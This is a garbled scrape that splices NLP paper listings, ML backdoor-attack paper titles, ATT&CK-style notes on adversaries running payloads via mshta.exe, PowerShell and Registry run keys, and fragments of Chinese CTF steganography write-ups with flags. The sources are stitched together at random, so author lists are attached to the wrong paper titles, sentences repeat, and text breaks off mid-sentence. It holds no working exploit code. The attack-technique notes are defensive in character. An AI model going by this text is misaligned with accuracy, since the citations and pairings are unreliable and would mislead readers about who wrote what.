Zhenzhu Chen, Shang Wang, Anmin Fu, Yansong Gao, Shui Yu, and Robert H. Deng. arXiv, 2021. Sinan Kurtyigit, Maike Park, Dominik Schlechtweg, Jonas Kuhn and Sabine Schulte Im Walde, Text2Event: Controllable Sequence-to-Structure Generation for End-to-end Event Extraction Yi Zeng, Si Chen, Won Park, Z. Morley Mao, Ming Jin, and Ruoxi Jia. Thomas Dopierre, Christophe Gravier and Wilfried Logerais, Subsequence Based Deep Active Learning for Named Entity Recognition [code], Turn the Combination Lock: Learnable Textual Backdoor Attacks via Word Substitution. Tetsuya Sakai, SocAoG: Incremental Graph Parsing for Social Relation Inference in Dialogues Priyam Tejaswin, Dhruv Naik and Pengfei Liu, Multilingual Translation from Denoising Pre-Training Rishav Hada, Sohi Sudhir, Pushkar Mishra, Helen Yannakoudakis, Saif M. Mohammad and Ekaterina Shutova, Learning Language and Multimodal Privacy-Preserving Markers of Mood from Mobile Data Shawn Shan, Emily Wenger, Bolun Wang, Bo Li, Haitao Zheng, Ben Y. Zhao. [pdf] Vardaan Pahuja, Yu Gu, Wenhu Chen, Mehdi Bahrami, Lei Liu, Wei-Peng Chen and Yu Su, Compare to The Knowledge: Graph Neural Fake News Detection with External Knowledge Pavan Kapanipathi, Ibrahim Abdelaziz, Srinivas Ravishankar, Salim Roukos, Alexander Gray, Ramon Fernandez Astudillo, Maria Chang, Cristina Cornelio, Saswati Dana, Achille Fokoue, Dinesh Garg, Alfio Gliozzo, Sairam Gurajada, Hima Karanam, Naweed Khan, Dinesh Khandelwal, Young-Suk Lee, Yunyao Li, Francois Luus, Ndivhuwo Makondo, Nandana Mihindukulasooriya, Tahira Naseem, Sumit Neelam, Lucian Popa, Revanth Gangi Reddy, Ryan Riegel, Gaetano Rossiello, Udit Sharma, G P Shrivatsa Bhargav and Mo Yu, Perceptual Models of Machine-Edited Text arXiv, 2022. [pdf], Rethinking the Backdoor Attacks' Triggers: A Frequency Perspective. Andrew Halterman, Katherine Keith, Sheikh Sarwar and Brendan OConnor, Memory-Efficient Differentiable Transformer Architecture Search injection (for fuzzing error handling), Concurrency bugs, memory disclosures, and side channels, Memory safety, control-flow integrity, (re-)randomization, [pdf], Game of Trojans: A Submodular Byzantine Approach. [pdf], LIRA: Learnable, Imperceptible and Robust Backdoor Attacks. [pdf], Identifying Physically Realizable Triggers for Backdoored Face Recognition Networks. Bolun Wang, Yuanshun Yao, Shawn Shan, Huiying Li, Bimal Viswanath, Haitao Zheng, Ben Y. Zhao. Deng Cai, Yan Wang, Huayang Li, Wai Lam and Lemao Liu, Scientific Credibility of Machine Translation Research: A Meta-Evaluation of 769 Papers arXiv, 2022. Liang Ding, Longyue Wang, Xuebo Liu, Derek F. Wong, Dacheng Tao and Zhaopeng Tu, Do Multilingual Neural Machine Translation Models Contain Language Pair Specific Attention Heads? arXiv, 2020. Yixin Cao, Xiang Ji, Xin Lv, Juanzi Li, Yonggang Wen and Hanwang Zhang, Unleash GPT-2 Power for Event Detection SONIC visualizer easily shows you spectrogram. Madhur Panwar, Shashank Shailabh, Milan Aggarwal and Balaji Krishnamurthy, LexFit: Lexical Fine-Tuning of Pretrained Language Models Retrieved January 27, 2022. [pdf] arXiv, 2021. Xi Li, George Kesidis, David J. Miller, and Vladimir Lucic. Pre-trained Language Model Distillation from Multiple Teachers [pdf] Yuanxin LIU, Fandong Meng, Zheng Lin, Weiping Wang and Jie Zhou, Measuring and Increasing Context Usage in Context-Aware Machine Translation Ayan Sengupta, Sourabh Kumar Bhattacharjee, Tanmoy Chakraborty and Md. Devendra Sachan, Mostofa Patwary, Mohammad Shoeybi, Neel Kant, Wei Ping, William L. Hamilton and Bryan Catanzaro, Using Meta-Knowledge Mined from Identifiers to Improve Intent Recognition in Conversational Systems Qing Lyu, Hongming Zhang, Elior Sulem and Dan Roth, AND does not mean OR: Using Formal Languages to Study Language Models Representations Li Du, Xiao Ding, Kai Xiong, Ting Liu and Bing Qin, CLIP: A Dataset for Extracting Action Items for Physicians from Hospital Discharge Notes [pdf], Agent Manipulator: Stealthy Strategy Attacks on Deep Reinforcement Learning. Yichong Xu, Chenguang Zhu, Ruochen Xu, Yang Liu, Michael Zeng and Xuedong Huang, Grammar-Constrained Neural Semantic Parsing with LR Parsers Khoa Doan, Yingjie Lao, Weijie Zhao, and Ping Li. Pengfei Xia, Hongjing Niu, Ziqiang Li, and Bin Li. [code], The Triggers that Open the NLP Model Backdoors Are Hidden in the Adversarial Samples. [pdf], TOP: Backdoor Detection in Neural Networks via Transferability of Perturbation. step2.txtrun wikihttps://zh.wikipedia.org/wiki/Whitespace, push: printc:ASCII dup: drop: add:,, 0555555printcchr(55)175,188,122printcchr(122)chr(188)chr(175)chr(), step, keyflag.txtwhitespace, wpachr(a)jsws_ide.jsprintcaa, flag.txtprintcdropstep2.txt\n\n\t\n flag, wimbinwalk, 65 68 68asciiADD656868, unicodectf.ssleye, left flagHUFU_LEFT& tweakpng y0u_f1nd_me,base64this_is_right_flag:&rgb_right_hufu, txt(0, 0, 0)(255, 255, 255)(0, 0, 0)1(255, 255, 255)0, SlientEye{1251521mxbctmm} . [pdf] [link], Coordinated Backdoor Attacks against Federated Learning with Model-Dependent Triggers. [pdf] Weile Chen, Huiqiang Jiang, Qianhui Wu, Borje Karlsson and Yi Guan, A Survey of Code-switching: Linguistic and Social Perspectives for Language Technologies Nyoungwoo Lee, Suwon Shin, Jaegul Choo, Ho-Jin Choi and Sung-Hyon Myaeng, Using Adversarial Attacks to Reveal the Statistical Bias in Machine Reading Comprehension Models [code], How to Inject Backdoors with Better Consistency: Logit Anchoring on Clean Data. Hengtong Lu, Zhuoxin Han, Caixia Yuan, Xiaojie Wang, Shuyu Lei, Huixing Jiang and Wei Wu, Word Graph Guided Summarization for Radiology Findings [pdf] Yijun Wang, Changzhi Sun, Yuanbin Wu, Hao Zhou, Lei Li and Junchi Yan, Question Answering Over Temporal Knowledge Graphs Nikita Nangia, Saku Sugawara, Harsh Trivedi, Alex Warstadt, Clara Vania and Samuel R. Bowman, Cross-language Sentence Selection via Data Augmentation and Rationale Training arXiv, 2020. Pei Chen, Haibo Ding, Jun Araki and Ruihong Huang, Bringing Structure into Summaries: a Faceted Summarization Dataset for Long Scientific Documents Rajat Bhatnagar, Ananya Ganesh and Katharina Kann, Automatic Fake News Detection: Are Models Learning to Reason? Retrieved June 13, 2022. Zhicong Yan, Jun Wu, Gaolei Li, Shenghong Li, and Mohsen Guizani. [pdf], SafeNet: Mitigating Data Poisoning Attacks on Private Machine Learning. [pdf], BEAS: Blockchain Enabled Asynchronous & Secure Federated Machine Learning. Hello, and welcome to Protocol Entertainment, your guide to the business of the gaming and media industries. Retrieved January 29, 2021. Tian Liu, Xueyang Hu, and Tao Shu. Dongqin Xu, Junhui Li, Muhua Zhu, Min Zhang and Guodong Zhou, Tree-Structured Topic Modeling with Nonparametric Neural Variational Inference [pdf], Constrained Optimization with Dynamic Bound-scaling for Effective NLPBackdoor Defense. Nan Yang, Furu Wei, Binxing Jiao, Daxing Jiang and Linjun Yang, Importance-based Neuron Allocation for Multilingual Neural Machine Translation [pdf], BaFFLe: Backdoor detection via Feedback-based Federated Learning. [1], POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts. Adjacency List Oriented Relational Fact Extraction via Adaptive Multi-task Learning [pdf], Explainability Matters: Backdoor Attacks on Medical Imaging. [pdf], Federated Learning in Adversarial Settings. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Liang Qiu, Yuan Liang, Yizhou Zhao, Pan Lu, Baolin Peng, Zhou Yu, Ying Nian Wu and Song-Chun Zhu, Meta-KD: A Meta Knowledge Distillation Framework for Language Model Compression across Domains Mingzhu Wu, Nafise Sadat Moosavi, Dan Roth and Iryna Gurevych, Evidence-based Factual Error Correction [code], PiDAn: A Coherence Optimization Approach for Backdoor Attack Detection and Mitigation in Deep Neural Networks. [link], Attack of the Tails: Yes, You Really Can Backdoor Federated Learning. Feilong Chen, Fandong Meng, Xiuyi Chen, Peng Li and Jie Zhou, Retrieve & Memorize: Dialog Policy Learning with Multi-Action Memory Qiushi Wu, Yang He, Stephen McCamant, and Kangjie Lu. Raouf Kerkouche, Gergely cs, and Claude Castelluccia. Domenic Donato, Lei Yu and Chris Dyer, Uncovering Constraint-Based Behavior in Neural Models via Targeted Fine-Tuning Yuqing Tang, Chau Tran, Xian Li, Peng-Jen Chen, Naman Goyal, Vishrav Chaudhary, Jiatao Gu and Angela Fan, Annotations Matter: Leveraging Multi-task Learning to Parse UD and SUD Workshop homepage: https://ethics-workshop.github.io/2023. nWB If it sounds like there is random bleeps and bloops in the sound, try this tactic! Jia-Ju Bai, Tuo Li, Kangjie Lu, and Shi-Min Hu. Zhuang Chen and Tieyun Qian, The Limitations of Limited Context for Constituency Parsing Jinlan Fu, Xuanjing Huang and Pengfei Liu, Self-Supervised Multimodal Opinion Summarization Jingjing Xu, Hao Zhou, Chun Gan, Zaixiang Zheng and Lei Li, Including Signed Languages in Natural Language Processing (2021, March 4). [pdf], Trojaning Language Models for Fun and Profit. Exploring the Weakness of Commonsense Causal Reasoning Models Liying Cheng, Tianyu Wu, Lidong Bing and Luo Si, Mitigating Bias in Session-based Cyberbullying Detection: A Non-Compromising Approach Jiawang Bai, Kuofeng Gao, Dihong Gong, Shu-Tao Xia, Zhifeng Li, and Wei Liu. Goshawk: Hunting Memory Corruptions via Structure-Aware and Object-Centric Memory Operation Synopsis. Retrieved June 18, 2018. Rui Liu, Zheng Lin, Yutong Tan and Weiping Wang, Manifold Adversarial Augmentation for Neural Machine Translation (2020, June 22). Libo Qin, Fuxuan Wei, Tianbao Xie, Xiao Xu, Wanxiang Che and Ting Liu, Explainable Prediction of Text Complexity: The Missing Preliminaries for Text Simplification arXiv, 2021. Zhi Chen, Lu Chen, Hanqi Li, Ruisheng Cao, Da Ma, Mengyue Wu and Kai Yu, Adjacency List Oriented Relational Fact Extraction via Adaptive Multi-task Learning Yi Yu, Adam Jatowt, Antoine Doucet, Kazunari Sugiyama and Masatoshi Yoshikawa, Learning to Explain: Generating Stable Explanations Fast Security (ICICS): 2019, 2021, 2022. (2022, February 8). Qiang Sheng, Juan Cao, Xueyao Zhang, Xirong Li and Lei Zhong, Unsupervised Neural Machine Translation for Low-Resource Domains via Meta-Learning arXiv, 2022. Zhuosheng Zhang and Hai Zhao, Learning Language Specific Sub-network for Multilingual Machine Translation Yu Tang, Long Zhou, Ambrosio Blanco, Shujie Liu, Furu Wei, Ming Zhou and Muyun Yang, Exploiting Position Bias for Robust Aspect Sentiment Classification Jieyu Zhao, Daniel Khashabi, Tushar Khot, Ashish Sabharwal and Kai-Wei Chang, Answer Generation for Retrieval-based Question Answering Systems Inigo Jauregi Unanue, Jacob Parnell and Massimo Piccardi, SaRoCo: Detecting Satire in a Novel Romanian Corpus of News Articles Kawin Ethayarajh and Dan Jurafsky, Learning Domain-Specialised Representations for Cross-Lingual Biomedical Entity Linking Alyac. Qingbao Huang, Chuan Huang, Linzhang Mo, Jielong Wei, Yi Cai, Ho-fung Leung and Qing Li, Probabilistic Graph Reasoning for Natural Proof Generation [link], Dispersed Pixel Perturbation-based Imperceptible Backdoor Trigger for Image Classifier Models. Survey; Toolbox; Dissertation and Thesis; Image and Video Classification. GranularNF: Granular Decomposition of Stateful NFV at 100 Gbps Line Speed and Beyond. [pdf] Jun Gao, Wei Bi, Ruifeng Xu and Shuming Shi, Relation Extraction with Type-aware Map Memories of Word Dependencies Farhad Moghimifar, Lizhen Qu, Terry Yue Zhuo, Gholamreza Haffari and Mahsa Baktashmotlagh, In Factuality: Efficient Integration of Relevant Facts for Visual Question Answering Yongliang Shen, Xinyin Ma, Zeqi Tan, Shuai Zhang, Wen Wang and Weiming Lu, A Joint Model for Dropped Pronoun Recovery and Conversational Discourse Parsing in Chinese Conversational Speech Nikolay Kolyada, Martin Potthast and Benno Stein, Knowledge Distillation for Quality Estimation [pdf], Check Your Other Door: Creating Backdoor Attacks in the Frequency Domain. Shuo Ren, Long Zhou, Shujie Liu, Furu Wei, Ming Zhou and Shuai Ma, Consistency Regularization for Cross-Lingual Fine-Tuning Dahan, A. Guimin Chen, Yuanhe Tian, Yan Song and Xiang Wan, PLATO-2: Towards Building an Open-Domain Chatbot via Curriculum Learning Aparna Garimella, Laura Chiticariu and Yunyao Li, Enhancing Dialogue-based Relation Extraction by Speaker and Trigger Words Prediction Vijay Viswanathan, Graham Neubig and Pengfei Liu, Changing the World by Changing the Data Jinyu Guo, Kai Shuang, Jijie Li and Zihan Wang, Integrating Semantics and Neighborhood Information with Graph-Driven Generative Models for Document Retrieval Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. [pdf], Towards Adversarial and Backdoor Robustness of Deep Learning. Jonathan K. Kummerfeld, The Case for Translation-Invariant Self-Attention in Transformer-Based Language Models learning and computer architecture. [pdf], An Invisible Black-box Backdoor Attack through Frequency Domain. Zeeshan Khan, Kartheek Akella, Vinay Namboodiri and C V Jawahar, More than just Frequency? Jinyuan Jia, Yupei Liu, Xiaoyu Cao, and Neil Zhenqiang Gong. Harsh Bimal Desai, Mustafa Safa Ozdayi, and Murat Kantarcioglu. Maximin Coavoux, Hyperbolic Temporal Knowledge Graph Embeddings with Relational and Time Curvatures Fenglin Liu, Changchang Yin, Xian Wu, Shen Ge, Ping Zhang and Xu Sun, O2NA: An Object-Oriented Non-Autoregressive Approach for Controllable Video Captioning [pdf], Backdoor Attacks on Self-Supervised Learning. arXiv, 2020. [link], Against Backdoor Attacks In Federated Learning With Differential Privacy. [pdf], Model-Contrastive Learning for Backdoor Defense. Steganography Software Packing North Koreas Lazarus APT leverages Windows Update client, GitHub in latest campaign. Paul Pu Liang, Terrance Liu, Anna Cai, Michal Muszynski, Ryo Ishii, Nick Allen, Randy Auerbach, David Brent, Ruslan Salakhutdinov and Louis-Philippe Morency, Prosodic segmentation for parsing spoken dialogue Reinforcement Learning, ImpNet: Imperceptible and blackbox-undetectable backdoors in compiled neural networks, Shielding Federated Learning: Mitigating Byzantine Attacks with Less Constraints, Backdoor Attacks in the Supply Chain of Masked Image Modeling, Invariant Aggregator for Defending Federated Backdoor Attacks. [code], Provable Defense against Backdoor Policies in Reinforcement Learning. *Christopher Potts, Zhengxuan Wu, Atticus Geiger and Douwe Kiela, IrEne: Interpretable Energy Prediction for Transformers Kyle Glandt, Sarthak Khanal, Yingjie Li, Doina Caragea and Cornelia Caragea, Bootstrapped Unsupervised Sentence Representation Learning SONIC Visualizer (audio spectrum) Some classic challenges use an audio file to hide a flag or other sensitive stuff. Chenyang Lyu, Shouling Ji, Xuhong Zhang, Hong Liang, Kangjie Lu, Binbin Zhao, and Raheem Beyah. arXiv, 2021. Shuang Zeng, Yuting Wu and Baobao Chang, KGPool: Dynamic Knowledge Graph Context Selection for Relation Extraction [pdf], Using Honeypots to Catch Adversarial Attacks on Neural Networks. Cheng-Hsin Weng, Yan-Ting Lee, and Shan-Hung Wu. Zhongkun Liu, Pengjie Ren, Zhumin CHEN, Zhaochun Ren, Maarten De Rijke and Ming Zhou, Multi-stage Pre-training over Simplified Multimodal Pre-training Models If they are not typically used within an environment then execution of them may be suspicious. [link] Submission deadline: December 20, 2022. [code], DriNet: Dynamic Backdoor Attack against Automatic Speech Recognization Models. Workshop homepage: https://ethics-workshop.github.io/2023. Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Liang Ding, Longyue Wang, Xuebo Liu, Derek F. Wong, Dacheng Tao and Zhaopeng Tu, ReadOnce Transformers: Reusable Representations of Text for Transformers Xinyu Zuo, Pengfei Cao, Yubo Chen, Kang Liu, Jun Zhao, Weihua Peng and Yuguang Chen, PAIR: Leveraging Passage-Centric Similarity Relation for Improving Dense Passage Retrieval Decoupled Dialogue Modeling and Semantic Parsing for Multi-Turn Text-to-SQL Zhi Chen, Lu Chen, Hanqi Li, Ruisheng Cao, Da Ma, Mengyue Wu and Kai Yu. Zhaohan Xi, Ren Pang, Shouling Ji, and Ting Wang. Emmanouil Antonios Platanios, Adam Pauls, Subhro Roy, Yuchen Zhang, Alexander Kyte, Alan Guo, Sam Thomson, Jayant Krishnamurthy, Jason Wolfe, Jacob Andreas and Dan Klein, CoRI: Collective Relation Integration with Data Augmentation for Open Information Extraction Ruohao Guo and Dan Roth, He is very intelligent, she is very beautiful? Huang-Cheng Chou, Woan-Shiuan Chien, Da-Cheng Juan and Chi-Chun Lee, High-Quality Dialogue Diversification by Intermittent Short Extension Ensembles num=1*e0.1num=1x,x Zilong Zheng, Shuwen Qiu, Lifeng Fan, Yixin Zhu and Song-Chun Zhu, Automatic Document Sketching: Generating Drafts from Analogous Texts Shuaiqi Liu, Jiannong Cao, Ruosong Yang and Zhiyuan Wen, Constraint based Knowledge Base Distillation in End-to-End Task Oriented Dialogs Xiuying Chen, Hind Alamro, Mingzhe Li, Shen Gao, Xiangliang Zhang, Dongyan Zhao and Rui Yan, Attention Calibration for Transformer in Neural Machine Translation [pdf], Adversarial examples are useful too! [website] Monitor use of HTA files. Chunliu Wang, Rik Van Noord, Arianna Bisazza and Johan Bos, Code Generation from Natural Language with Less Prior Knowledge and More Monolingual Data [code], Backdooring and Poisoning Neural Networks with Image-Scaling Attacks. arXiv, 2022. Retrieved December 27, 2018. Linlin Liu, BOSHENG DING, Lidong Bing, Shafiq Joty, Luo Si and Chunyan Miao, Discovering Dialogue Slots with Weak Supervision Zhihong Chen, Yaling Shen, Yan Song and Xiang Wan, On Compositional Generalization of Neural Machine Translation Yingzhe He, Guozhu Meng, Kai Chen, Jinwen He, and Xingbo Hu. Mukund Srinath, Shomir Wilson and C Lee Giles, GL-GIN: Fast and Accurate Non-Autoregressive Model for Joint Multiple Intent Detection and Slot Filling Zhiyi Tian, Lei Cui, Jie Liang, and Shui Yu. Singh, S. et al.. (2018, March 13). arXiv, 2021. Hello, and welcome to Protocol Entertainment, your guide to the business of the gaming and media industries. Navid Emamdoost, Qiushi Wu, Kangjie Lu, and Stephen McCamant. [pdf], A Backdoor Attack Against LSTM-based Text Classification Systems. arXiv, 2022. Philine Zeinert, Nanna Inie and Leon Derczynski, Search from History and Reason for Future: Two-stage Reasoning on Temporal Knowledge Graphs Linqing Chen, Junhui Li, Zhengxian Gong, Boxing Chen, Weihua Luo, Min Zhang and Guodong Zhou, MultiMET: A Multimodal Dataset for Metaphor Understanding Guanxiong Liu, Abdallah Khreishah, Fatima Sharadgah, and Issa Khalil. Shuwen Chai and Jinghui Chen. Cheonbok Park, Yunwon Tae, TaeHee Kim, Soyoung Yang, Mohammad Azam Khan, Lucy Park and Jaegul Choo, Taming Pre-trained Language Models with N-gram Representations for Low-Resource Domain Adaptation SONIC visualizer easily shows you spectrogram. flag{1251_521_m1xueb1n9chen9ti@nm1mi}, foremostflag ()jpg, ID\FileStorage\Tempdump, Q1Da1A1qINgDeT0KeI1 flag.txt, bugku{s1mple_D1gital_f0rens1cs_%s_%s_%s}(qqnumber,qqname,wechatpicxorvalue(HEX,lowercase)), qqdump, qq54297198bugkuhhh, jpg, exif bugku password.txt, https://music.163.com/#/song?id=1384960031 base64flag, key.rar.zip, pdf 100 mumuzi emoji emojibase100emoji-aes100base100() mumuziyyds key.rar666666key.txtkey.txt, 6, docdocument.xml, =, flagflag{Chu_7_Bu_1_90n9_7_Bu_Be1}, king.jpgcode.txtbase64, kinglet.jpg key{P0ke_Paper}Poke.zipP0ke_Paperk.jpg Davids words.txtOnly A is 1 23456789100A1, base64Happy to tell you key is Key{OMG_Youdoit}, k.zipOMG_YoudoitAncient spells.txt, As long as you help me to fix, Ill give you what you want. Shen Gao, Xiuying Chen, Chang Liu, Dongyan Zhao and Rui Yan, Multilingual Simultaneous Neural Machine Translation [pdf] Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. Fuli Feng, Jizhi Zhang, Xiangnan He, Hanwang Zhang and Tat-Seng Chua, Knowledge-Empowered Representation Learning for Chinese Medical Reading Comprehension: Task, Model and Resources (It Is Reverse Flag), 010k.jpg Stegsolve, 0o @ a flag, key010keyjpgkey.txt, , basekey.jpgexif basebasecrack base58664-6=58. Retrieved July 6, 2018. Huiyuan Lai, Antonio Toral and Malvina Nissim, DefSent: Sentence Embeddings using Definition Sentences Shaofeng Li, Hui Liu, Tian Dong, Benjamin Zi Hao Zhao, Minhui Xue, Haojin Zhu, and Jialiang Lu. Ahmed Salem, Yannick Sautter, Michael Backes, Mathias Humbert, and Yang Zhang. Nghia Ngo Trung, Duy Phung and Thien Huu Nguyen, Learning Contextualized Knowledge Structures for Commonsense Reasoning [code], WaNet - Imperceptible Warping-based Backdoor Attack. [pdf], Robust Federated Learning with Attack-Adaptive Aggregation. Retrieved November 2, 2018. Yansong Gao, Bao Gia Doan, Zhi Zhang, Siqi Ma, Anmin Fu, Surya Nepal, and Hyoungshick Kim. Aman Madaan, Dheeraj Rajagopal, Niket Tandon, Yiming Yang and Eduard Hovy, Characterizing Social Spambots by their Human Traits Israa Alghanmi, Luis Espinosa Anke and Steven Schockaert, AugVic: Exploiting BiText Vicinity for Low-Resource NMT Operation Cobalt Kitty. Ana Sabina Uban, Cornelia Caragea and Liviu P. Dinu, A Mixed-Method Design Approach for Empirically Based Selection of Unbiased Data Annotators [pdf], Universal Litmus Patterns: Revealing Backdoor Attacks in CNNs. Shuhuai Ren, Junyang Lin, Guangxiang Zhao, Rui Men, An Yang, Jingren Zhou, Xu Sun and Hongxia Yang, TGEA: An Error-Annotated Dataset and Benchmark Tasks for TextGeneration from Pretrained Language Models Zhiwen Tang, Hrishikesh Kulkarni and Grace Hui Yang, Structured Refinement for Sequential Labeling Jiarui Yao, Haoling Qiu, Jin Zhao, Bonan Min and Nianwen Xue, Accelerating Text Communication via Abbreviated Sentence Input [pdf], Threats to Pre-trained Language Models: Survey and Taxonomy. Carlos Aspillaga, Marcelo Mendoza and Alvaro Soto, Latent Reasoning for Low-Resource Question Generation [pdf], Odyssey: Creation, Analysis and Detection of Trojan Models. Joe OConnor and Jacob Andreas, From Machine Translation to Code-Switching: Generating High-Quality Code-Switched Text Zhuoyuan Mao, Prakhar Gupta, Chenhui Chu, Martin Jaggi and Sadao Kurohashi, HateCheck: Functional Tests for Hate Speech Detection Models [code], Invisible Poison: A Blackbox Clean Label Backdoor Attack to Deep Neural Networks. [pdf], Neurotoxin: Durable Backdoors in Federated Learning. Peiyu Liu, Shouling Ji, Lirong Fu, Kangjie Lu, Xuhong Zhang, Wei-Han Lee, Tao Lu, Wenzhi Chen, and Raheem Beyah. [29], During Operation Dust Storm, the threat actors executed JavaScript code via mshta.exe. [code] arXiv, 2020. [18][12][19][20], Koadic can use mshta to serve additional payloads and to help schedule tasks for persistence. [link], BlindNet Backdoor: Attack on Deep Neural Network using Blind Watermark. Ximing Qiao, Yuhua Bai, Siping Hu, Ang Li, Yiran Chen, and Hai Li. Ship Peng Xu, Ke Wang, Md. Xinyu Wang, Yong Jiang, Nguyen Bach, Tao Wang, Zhongqiang Huang, Fei Huang and Kewei Tu, Improving Factual Consistency of Abstractive Summarization via Question Answering [32], Sidewinder has used mshta.exe to execute malicious payloads. arXiv, 2020. A Study of Heuristics vs. Bi-Level Solution. Wikipedia. [code], Hiding Needles in a Haystack: Towards Constructing Neural Networks that Evade Verification. Presupposition Verification for Question-Answering Weights [code], PICCOLO: Exposing Complex Backdoors in NLP Transformer Models. Weights Siddhartha Datta, Giulio Lovisotto, Ivan Martinovic, and Nigel Shadbolt. Lu Cheng, Ahmadreza Mosallanezhad, Yasin Silva, Deborah Hall and Huan Liu, Novel Slot Detection: A Benchmark for Discovering Unknown Slot Types in the Task-Oriented Dialogue System [pdf] [code], Backdoor Attacks on Crowd Counting. Giorgio Severi, Jim Meyer, Scott Coull, and Alina Oprea. [pdf] Eugene Bagdasaryan, and Vitaly Shmatikov. arXiv, 2021. Kosuke Nishida, Kyosuke Nishida and Sen Yoshida, Do Grammatical Error Correction Models Realize Grammatical Generalization? Workshop homepage: https://ethics-workshop.github.io/2023. (2021, January 7). arXiv, 2021. Crowdstrike. [journal], Targeted Backdoor Attacks on Deep Learning Systems Using Data Poisoning. Adversarial and Backdoor Attacks Based on Text Style Transfer. In this article, we will be using the steghide tool to hide data in an image file. Munachiso Nwadike, Takumi Miyawaki, Esha Sarkar, Michail Maniatakos, and Farah Shamout. arXiv, 2020. [extension], Defense-Resistant Backdoor Attacks against Deep Neural Networks in Outsourced Cloud Environment. Shuang Wu, Xiaoning Song and Zhenhua Feng, VisualSparta: An Embarrassingly Simple Approach to Large-scale Text-to-Image Search with Weighted Bag-of-words Eleftheria Briakou and Marine Carpuat, Continuous Language Generative Flow Alisa Liu, Maarten Sap, Ximing Lu, Swabha Swayamdipta, Chandra Bhagavatula, Noah A. Smith and Yejin Choi, Topic-Aware Evidence Reasoning and Stance-Aware Aggregation for Fact Verification Yiming Li, Tongqing Zhai, Yong Jiang, Zhifeng Li, and Shu-Tao Xia. Rewterz. Marcin Namysl, Sven Behnke and Joachim Kohler, Spatial Dependency Parsing for Semi-Structured Document Information Extraction Lorenzo Bertolini, Julie Weeds, David Weir and Qiwei Peng, To Point or Not to Point: Understanding How Abstractive Summarizers Paraphrase Text Peizhuo Lv, Hualong Ma, Jiachen Zhou, Ruigang Liang, Kai Chen, Shengzhi Zhang, and Yunfei Yang. Kaspersky Lab's Global Research & Analysis Team. Poisoning-based Attack; Non-poisoning-based Attack. Fangwei Zhu, Shangqing Tu, Jiaxin Shi, Juanzi Li, Lei Hou and Tong Cui, Towards Emotional Support Dialog Systems You Zhang, Jin Wang, Liang-Chih Yu and Xuejie Zhang, Event Extraction from Historical Texts: A New Dataset for Black Rebellions Chuan Guo, Ruihan Wu, and Kilian Q. Weinberger. XIAO Steganography arXiv, 2021. Chen Wu, Sencun Zhu, and Prasenjit Mitra. Zenan Xu, Daya Guo, Duyu Tang, Qinliang Su, Linjun Shou, Ming Gong, Wanjun Zhong, Xiaojun Quan, Daxin Jiang and Nan Duan, Towards Propagation Uncertainty: Edge-enhanced Bayesian Graph Convolutional Networks for Rumor Detection Jonathan Hayase, Weihao Kong, Raghav Somani, and Sewoong Oh. oh!! Hai Wan, Haicheng Chen, Jianfeng Du, Weilin Luo and Rongzhen Ye, Topic-Driven and Knowledge-Aware Transformer for Dialogue Emotion Detection Keita Kurita, Paul Michel, and Graham Neubig. [link], IBAttack: Being Cautious about Data Labels. Wenkai Zhang, Hongyu Lin, Xianpei Han and Le Sun, Beyond Sentence-Level End-to-End Speech Translation: Context Helps Jing Xu, Rui Wang, Kaitai Liang, and Stjepan Picek. Bill Byrne, Karthik Krishnamoorthi, Saravanan Ganesh and Mihir Kale, Unified Dual-view Cognitive Model for Interpretable Claim Verification Ruiqing Zhang, Chao Pang, Chuanqiang Zhang, Shuohuan Wang, Zhongjun He, Yu Sun, Hua Wu and Haifeng Wang, Multi-Lingual Question Generation with Language Agnostic Language Model Chaoran Li, Xiao Chen, Derui Wang, Sheng Wen, Muhammad Ejaz Ahmed, Seyit Camtepe, and Yang Xiang. Lianbo Ma, Huimin Ren, Zhiwei Lin and Xiliang Zhang, Learning to Bridge Metric Spaces: Few-shot Joint Learning of Intent Detection and Slot Filling arXiv, 2019. [pdf], Model Agnostic Defense against Backdoor Attacks in Machine Learning. Tong Zhou, Pengfei Cao, Yubo Chen, Kang Liu, Jun Zhao, Kun Niu, Weifeng Chong and Shengping Liu, E2E-VLP: End-to-End Vision-Language Pre-training Enhanced by Visual Learning [code], FLGUARD: Secure and Private Federated Learning. Xin Xin, Jinlong Li and Zeqi Tan, Math Word Problem Solving with Explicit Numerical Values arXiv, 2022. [code], One Step Further: Evaluating Interpreters using Metamorphic Testing. Yinghua Gao, Dongxian Wu, Jingfeng Zhang, Guanhao Gan, Shu-Tao Xia, Gang Niu, and Masashi Sugiyama. Tingting Ma, Jin-Ge Yao, Chin-Yew Lin and Tiejun Zhao, Difficulty-Aware Machine Translation Evaluation Lingfeng Shen, Haiyun Jiang, Lemao Liu, and Shuming Shi. Leilei Gan, Jiwei Li, Tianwei Zhang, Xiaoya Li, Yuxian Meng, Fei Wu, Shangwei Guo, and Chun Fan. [link], Anti-Distillation Backdoor Attacks: Backdoors Can Really Survive in Knowledge Distillation. [pdf], Clean-Annotation Backdoor Attack against Lane Detection Systems in the Wild. [pdf], SanitAIs: Unsupervised Data Augmentation to Sanitize Trojaned Neural Networks. [pdf], Defending Against Backdoor Attack on Graph Nerual Network by Explainability. (2022, January 31). McCammon, K. (2015, August 14). Static Detection of Unsafe DMA Accesses in Device Drivers. Hao Sun, Zhenru Lin, Chujie Zheng, Siyang Liu and Minlie Huang, RiddleSense: Reasoning about Riddle Questions Featuring Linguistic Creativity and Commonsense Knowledge Machel Reid and Victor Zhong, Constructing Flow Graphs from Procedural Cybersecurity Texts [pdf] Sweta Agrawal, Weijia Xu and Marine Carpuat, Investigating Transfer Learning in Multilingual Pre-trained Language Models through Chinese Natural Language Inference Steghide is a command-line tool that allows you to Practical Program Modularization with Type-Based Dependence Analysis, How IoT Re-using Threatens Your Sensitive Data: Exploring the User-Data Disposal in Used IoT Devices. [9], APT32 has used mshta.exe for code execution. Abiola Obamuyide, Marina Fomicheva and Lucia Specia, Relative Importance in Sentence Processing We are grateful for NSF for supporting the following projects. Decoupled Dialogue Modeling and Semantic Parsing for Multi-Turn Text-to-SQL Zhi Chen, Lu Chen, Hanqi Li, Ruisheng Cao, Da Ma, Mengyue Wu and Kai Yu. I am an assistant professor in the Computer Science & Engineering [code], Trembling Triggers: Exploring the Sensitivity of Backdoors in DNN-based Face Recognition. [pdf], Data Security for Machine Learning: Data Poisoning, Backdoor Attacks, and Defenses. Use application control configured to 